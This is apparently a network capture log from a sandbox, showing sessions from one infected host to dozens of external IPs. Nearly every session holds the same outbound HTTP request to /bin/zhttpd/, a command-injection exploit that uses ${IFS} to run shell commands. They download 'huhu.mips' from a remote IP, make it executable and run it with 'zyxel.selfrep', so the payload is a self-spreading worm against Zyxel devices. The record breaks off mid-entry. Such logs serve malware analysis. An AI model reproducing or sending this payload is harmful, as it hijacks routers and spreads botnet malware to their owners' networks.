                                                      Feb 2, 2024 06:35:42.398439884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1711192.168.2.1450412213.160.25.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398446083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1712192.168.2.145216292.144.178.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398478031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1713192.168.2.1447010142.159.130.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398529053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1714192.168.2.1445292153.156.186.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398577929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1715192.168.2.1459700193.28.102.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398626089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1716192.168.2.145935883.214.100.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398663044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1717192.168.2.145308669.177.18.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398699999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1718192.168.2.1446832144.176.234.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398725033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1719192.168.2.1450836149.44.186.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398756027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1720192.168.2.1436244195.8.228.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398818970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1721192.168.2.145273083.57.26.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398848057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1722192.168.2.1451828203.71.156.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398880959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1723192.168.2.143901277.76.34.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398920059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1724192.168.2.1437326204.7.120.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398957968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1725192.168.2.1435594190.58.195.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399003029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1726192.168.2.145567814.48.14.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399055958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1727192.168.2.1443340203.54.46.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399085045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1728192.168.2.145726237.38.226.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399125099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1729192.168.2.1453000160.15.211.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399152994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1730192.168.2.1441170143.200.36.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399188995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1731192.168.2.145589077.155.52.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399276972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1732192.168.2.1451824108.232.90.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399322033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1733192.168.2.1439400158.104.216.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399379015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1734192.168.2.1440658187.88.72.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399409056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1735192.168.2.14382262.102.8.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399470091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1736192.168.2.1451636179.90.187.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399494886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1737192.168.2.144403292.107.17.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399549961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1738192.168.2.145731043.211.133.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399590969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1739192.168.2.1457518110.80.108.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399633884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1740192.168.2.1447228219.239.191.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399682045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1741192.168.2.1438996170.122.43.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399710894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1742192.168.2.144237814.226.143.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399745941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1743192.168.2.1451986132.57.77.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399799109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1744192.168.2.1450060190.11.227.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399847984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1745192.168.2.1441928185.124.238.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399883032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1746192.168.2.143702871.222.177.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399939060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1747192.168.2.1449948217.230.66.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.399980068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1748192.168.2.1458854160.254.244.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400031090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1749192.168.2.144424480.109.29.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400077105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1750192.168.2.1450410157.87.188.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400129080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1751192.168.2.1450450143.24.189.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400162935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1752192.168.2.145146093.102.133.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400202990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1753192.168.2.1457256169.212.221.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400254011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1754192.168.2.1433188120.153.67.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400275946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1755192.168.2.145061078.36.115.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400350094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1756192.168.2.144997246.64.105.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400367022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1757192.168.2.14576241.182.127.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400397062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1758192.168.2.1441650115.184.13.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400428057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1759192.168.2.1442840100.214.88.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400470972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1760192.168.2.1458170202.15.56.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400499105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1761192.168.2.145770061.199.128.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400537968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1762192.168.2.1447802102.69.132.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400577068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1763192.168.2.1437308209.197.240.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400633097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1764192.168.2.143401045.125.201.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400656939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1765192.168.2.1445692169.48.174.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400742054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1766192.168.2.1449320184.102.206.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400782108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1767192.168.2.1452472222.238.14.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400814056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1768192.168.2.1447202120.149.238.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400855064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1769192.168.2.1435766141.29.14.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400898933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1770192.168.2.144052431.70.129.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400938034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1771192.168.2.144518463.149.95.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.400966883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1772192.168.2.145607680.248.177.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401006937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1773192.168.2.145736057.105.36.235443
                                                      TimestampBytes transferredDirectionData
